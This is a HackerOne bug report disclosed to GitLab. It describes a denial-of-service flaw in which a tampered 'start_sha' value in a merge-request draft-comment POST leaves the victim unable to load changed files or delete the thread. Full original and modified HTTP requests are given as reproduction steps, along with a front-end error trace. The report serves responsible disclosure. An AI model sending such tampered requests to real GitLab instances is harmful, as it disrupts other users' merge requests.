Invalid 'start_sha' value in POST `/{group}/{project}/-/merge_requests/{id}/drafts` when comment on merge requests leads to changes unable to load
HackerOne report #2058514 by toukakirishima
on 2023-07-09, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Summary
I found a DOS vulnerability when comment on file merge requests (on the Changes menu). I noticed if start_sha is not validated first it causes DOS (user can't load file on Changes menu and cant delete the thread).
Normally you can delete threads that you have created.
And can load files on Changes menu.
But as an attacker I can make the victim unable to load file on Changes menu and cant delete the thread. Even admin can't delete thread.
Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.
And Touka Kirishima (victim) made Merge requests.
Steps to reproduce
- Go to merge requests
- Go to Changes menu
- Comment on this file
- Click Start a review and makesure burpsuite is on. You will see request like following, Example :
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
- Send to Repeater
- Change start_sha. Example :
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c15382791\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
- Click Send
- Finish and Submit review
- Reload the page and you unable to load file on Changes menu and cant delete the thread
POV from Attacker
POV from Victim
POC
bandicam_2023-07-09_19-04-28-764.mp4
Relevant logs and/or screenshots
TypeError: this.discussion.diff_file is null diffViewerMode diff_with_note.vue:44 VueJS 3 get evaluate Gr isTextFile diff_with_note.vue:56 VueJS 3 get evaluate Gr U diff_with_note.vue:1 VueJS 52 _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n instrument.js:108:32 kt instrument.js:108 VueJS 55 mn gn pn _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n
Output of checks
This bug happens on GitLab.com
Impact
- Attacker can make the victim unable to load file on Changes menu.
- Attacker can make the victim cant delete the thread. Even admin can't delete thread.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- gambar.png
- gambar.png
- gambar.png
- Screenshot_10.png
- gambar.png
- gambar.png
- gambar.png
- gambar.png
- Screenshot_12.png
- gambar.png
- gambar.png
- Screenshot_13.png
- gambar.png
- Screenshot_14.png
- Screenshot_15.png
- Screenshot_16.png
- gambar.png
- bandicam_2023-07-09_19-04-28-764.mp4
How To Reproduce
Please add reproducibility information to this section: